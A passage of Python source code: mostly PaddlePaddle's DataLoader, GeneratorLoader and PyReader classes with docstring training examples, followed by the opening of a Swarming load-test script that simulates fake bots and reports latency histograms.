dp_layer = paddle.DataParallel(layer)
loss_fn = nn.CrossEntropyLoss()
adam = opt.Adam(learning_rate=0.001, parameters=dp_layer.parameters())
# create data loader
loader = paddle.io.DataLoader.from_generator(capacity=5)
loader.set_batch_generator(random_batch_reader())
for epoch_id in range(EPOCH_NUM):
for batch_id, (image, label) in enumerate(loader()):
out = layer(image)
loss = loss_fn(out, label)
loss.backward()
adam.step()
adam.clear_grad()
print("Epoch {} batch {}: loss = {}".format(
epoch_id, batch_id, np.mean(loss.numpy())))
Examples 3:
.. code-block:: python
'''
Example of `drop_last` using in static graph multi-cards mode
'''
import paddle
import paddle.static as static
import numpy as np
import os
# We use 2 CPU cores to run inference network
os.environ['CPU_NUM'] = '2'
paddle.enable_static()
# The data source has only 3 batches, which can not be
# divided evenly to each CPU core
def batch_generator():
for i in range(3):
yield np.array([i+1]).astype('float32'),
x = static.data(name='x', shape=[None], dtype='float32')
y = x * x
def run_inference(drop_last):
loader = paddle.io.DataLoader.from_generator(feed_list=[x],
capacity=8, drop_last=drop_last)
loader.set_batch_generator(batch_generator, static.cpu_places())
exe = static.Executor(paddle.CPUPlace())
prog = static.CompiledProgram(static.default_main_program())
prog = prog.with_data_parallel()
result = []
for data in loader():
each_ret, = exe.run(prog, feed=data, fetch_list=[y])
result.extend(each_ret)
return result
# Set drop_last to True, so that the last batch whose
# number is less than CPU core number would be discarded.
print(run_inference(drop_last=True)) # [1.0, 4.0]
# Set drop_last to False, so that the last batch whose
# number is less than CPU core number can be tested.
print(run_inference(drop_last=False)) # [1.0, 4.0, 9.0]
"""
if in_dygraph_mode():
return DygraphGeneratorLoader(feed_list, capacity,
use_double_buffer, iterable,
return_list, use_multiprocess)
else:
return GeneratorLoader(feed_list, capacity, use_double_buffer,
iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
Create an iterable DataLoader object for loading data from Dataset.
Dataset is only supported in Linux system currently.
Args:
dataset (InMemoryDataset|QueueDataset): the dataset object.
places (list(CUDAPlace)|list(CPUPlace)|list(str)): places where the result
data should be converted. If places is list of string, the string in the list
can be ``cpu``, ``gpu:x`` and ``gpu_pinned``, where x is the index of the GPUs.
drop_last (bool): whether to drop the last batch whose sample
number is less than batch size. If drop_last = True, they
would be dropped. If drop_last = False, they would be kept.
Returns:
loader (DataLoader): the created DataLoader object, which can be
treated as a Python generator.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
dataset = paddle.distributed.QueueDataset()
dataset.init(
batch_size=32,
pipe_command='cat',
use_var=[image, label])
dataset.set_filelist(['a.txt', 'b.txt', 'c.txt'])
loader = paddle.io.DataLoader.from_dataset(dataset, static.cpu_places())
"""
return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
The GeneratorLoader of dygraph
Most functions of the multiprocess dygraph GeneratorLoader differ from the
static graph GeneratorLoader; it is implemented separately to keep the code readable.
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=True,
use_multiprocess=False):
self._batch_reader = None
self._places = None
self._feed_list = feed_list
if not capacity:
raise ValueError("Please give value to capacity.")
self._capacity = capacity
self._use_double_buffer = use_double_buffer
if not iterable:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
)
self._iterable = True
if not return_list:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
)
self._return_list = True
# NOTE: the multiprocessing in different platform is incompatible, we will solve it later
self._use_multiprocess = use_multiprocess
if self._use_multiprocess and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
)
self._use_multiprocess = False
if self._use_multiprocess:
# NOTE: the multiprocessing.Queue used to save loading data in self._process
self._data_queue = None
# NOTE: this process is used to load data asynchronously from self._batch_reader
self._process = None
# NOTE: the C++ LoDTensorBlockingQueue instance
self._blocking_queue = None
# NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
# self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
# mode, this thread is used to get next batch data from self._batch_reader, then
# push it into self._blocking_queue
self._thread = None
self._pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
@property
def queue(self):
return self._blocking_queue
@property
def iterable(self):
return self._iterable
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except queue.Empty:
break
global multiprocess_queue_set
multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
thread = self._thread
if thread is not None:
self._blocking_queue.close()
thread.join()
def _wait_process_ends(self):
process = self._process
if process is not None:
process.join()
# erase process id
core._erase_process_pids(id(self))
def _init_iterable(self):
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
self._var_names = []
self._shapes = []
self._dtypes = []
self._need_check_feed = []
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, False)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer, True,
self._pin_memory)
def _start(self):
if self._use_multiprocess:
# clear old _data_queue and remove it from multiprocess_queue_set
self._clear_and_remove_data_queue()
# set data_queue and process
self._data_queue = multiprocessing.Queue(self._capacity)
# add _data_queue into global queue set
global multiprocess_queue_set
multiprocess_queue_set.add(self._data_queue)
self._process = multiprocessing.Process(
target=_reader_process_loop,
args=(self._batch_reader, self._data_queue))
self._process.daemon = True
self._process.start()
# Set child process signal handler
# NOTE: [ avoiding hang ] 1. if the child process dies due to bus error/segfault
# or just hang, the main process will hang waiting for data, so here need to deal
# with SIGSEGV and SIGBUS of the child process; 2. if the main process ends before the child
# process, it shuts all its daemonic children down with a SIGTERM (instead of
# joining them without a timeout), so here we need to deal with SIGTERM.
core._set_process_pids(id(self), [self._process.pid])
_set_SIGCHLD_handler()
# Set reader_thread
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._reader_thread_loop_for_multiprocess)
self._thread.daemon = True
self._thread.start()
else:
self._thread = threading.Thread(
target=self._reader_thread_loop_for_singleprocess)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._reader.reset()
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._batch_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
return self._reader.read_next_var_list()
except StopIteration:
self._reset()
six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self):
while not self._thread_done_event.is_set():
try:
# NOTE: [ avoid hanging ] Even with carefully designed data dependencies
# (i.e., a put() always corresponding to a get()), hanging on get() can
# still happen when data in queue is corrupted (e.g., due to
# Queue.cancel_join_thread or unexpected exit). So we set a timeout whenever
# we try to get data from `data_queue`
# NOTE: [ avoid failed quickly ] Here, the time setting of QUEUE_GET_TIMEOUT
# is relatively long, currently it is 60 seconds, because in some models,
# if the reader child process starts with a heavy burden, the child process
# does not have enough time to put the data in the queue when the main process
# starts trying to get data from the queue. At this time, the child thread needs
# to wait slightly longer
tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
except:
# NOTE [ avoid hanging ] After adding the shared memory mechanism, not only
# the queue.Empty exception will occur here, but other exceptions will also
# occur, such as mmap failure. If it is not handled here, it will hang.
self._exit_thread_unexpectedly()
logging.error(
"DataLoader reader thread failed to read data from the multiprocessing.Queue."
)
six.reraise(*sys.exc_info())
if not self._thread_done_event.is_set():
if tensor_list is not None:
try:
array = core.LoDTensorArray()
for tensor in tensor_list:
array.append(tensor)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
else:
self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self):
try:
for sample in self._batch_reader():
array = core.LoDTensorArray()
for item in sample:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning(
"DygraphDataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
return self
def set_sample_list_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
def __batch_reader_impl__():
for batch in reader():
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
yield slots
self.set_batch_generator(__batch_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self._batch_reader = reader
if places is None:
places = _current_expected_place()
self._places = _convert_places(places)
assert len(self._places) == 1, \
"Number of places must be 1 in imperative mode"
return self
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
# would set self._thread to None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__():
try:
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warn('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(target=__thread_main__)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
if has_lod:
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
logging.info(
'places would be omitted when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
r"""
Create a reader object for data feeding in Python.
Data would be prefetched using a Python thread and pushed
into a queue asynchronously. Data in the queue would be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, PyReader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupy a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
inserted into the program. User should call :code:`start()`
before each epoch and catch :code:`fluid.core.EOFException`
thrown by :code:`Executor.run()` when epoch ends. Once the
exception is caught, user should call :code:`reset()` to reset
the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
2. If iterable=True, the created PyReader object is decoupled from
the program. No operator would be inserted into the program.
In this case, the created reader is a Python generator, which
is iterable. User should feed the data yielded from PyReader
object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as list instead of dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object when :code:`fluid.core.EOFException` raises.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray) typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warn('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
|
swarming_load_test_bot.py
|
#!/usr/bin/env python
# Copyright 2013 The Swarming Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0 that
# can be found in the LICENSE file.
"""Triggers a ton of fake jobs to test its handling under high load.
Generates a histogram of the latencies to process the tasks and the number of
retries.
"""
import hashlib
import json
import logging
import optparse
import os
import Queue
import socket
import StringIO
import sys
import threading
import time
import zipfile
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
from third_party import colorama
import swarming
from utils import graph
from utils import net
from utils import threading_utils
# Line too long (NN/80)
# pylint: disable=C0301
OS_NAME = 'Comodore64'
TASK_OUTPUT = 'This task ran with great success'
def print_results(results, columns, buckets):
delays = [i for i in results if isinstance(i, float)]
failures = [i for i in results if not isinstance(i, float)]
print('%sDELAYS%s:' % (colorama.Fore.RED, colorama.Fore.RESET))
graph.print_histogram(
graph.generate_histogram(delays, buckets), columns, ' %.3f')
print('')
print('Total items : %d' % len(results))
average = 0
if delays:
average = sum(delays)/ len(delays)
print('Average delay: %s' % graph.to_units(average))
print('')
if failures:
print('%sEVENTS%s:' % (colorama.Fore.RED, colorama.Fore.RESET))
values = {}
for f in failures:
values.setdefault(f, 0)
values[f] += 1
graph.print_histogram(values, columns, ' %s')
print('')
def generate_version(source):
"""Generates the sha-1 based on the content of this zip.
Copied from:
https://code.google.com/p/swarming/source/browse/services/swarming/swarm_bot/zipped_archive.py
"""
result = hashlib.sha1()
with zipfile.ZipFile(source, 'r') as z:
for item in sorted(z.namelist()):
with z.open(item) as f:
result.update(item)
result.update('\x00')
result.update(f.read())
result.update('\x00')
return result.hexdigest()
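# Illustrative only: for each file in the zip (in sorted name order) the hash
# covers "<name>\x00<content>\x00", so the resulting version digest depends on
# the archive contents but not on zip metadata such as timestamps.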
def calculate_version(url):
"""Retrieves the swarm_bot code and returns the SHA-1 for it."""
# Cannot use url_open() since zipfile requires .seek().
return generate_version(StringIO.StringIO(net.url_read(url)))
def get_hostname():
return socket.getfqdn().lower().split('.', 1)[0]
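# Illustrative only: with a hypothetical FQDN like 'loadbot3.example.com',
# get_hostname() returns 'loadbot3'.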
class FakeSwarmBot(object):
"""This is a Fake swarm_bot implementation simulating it is running
Comodore64.
It polls for job, acts as if it was processing them and return the fake
result.
"""
def __init__(
self, swarming_url, dimensions, swarm_bot_version_hash, hostname, index,
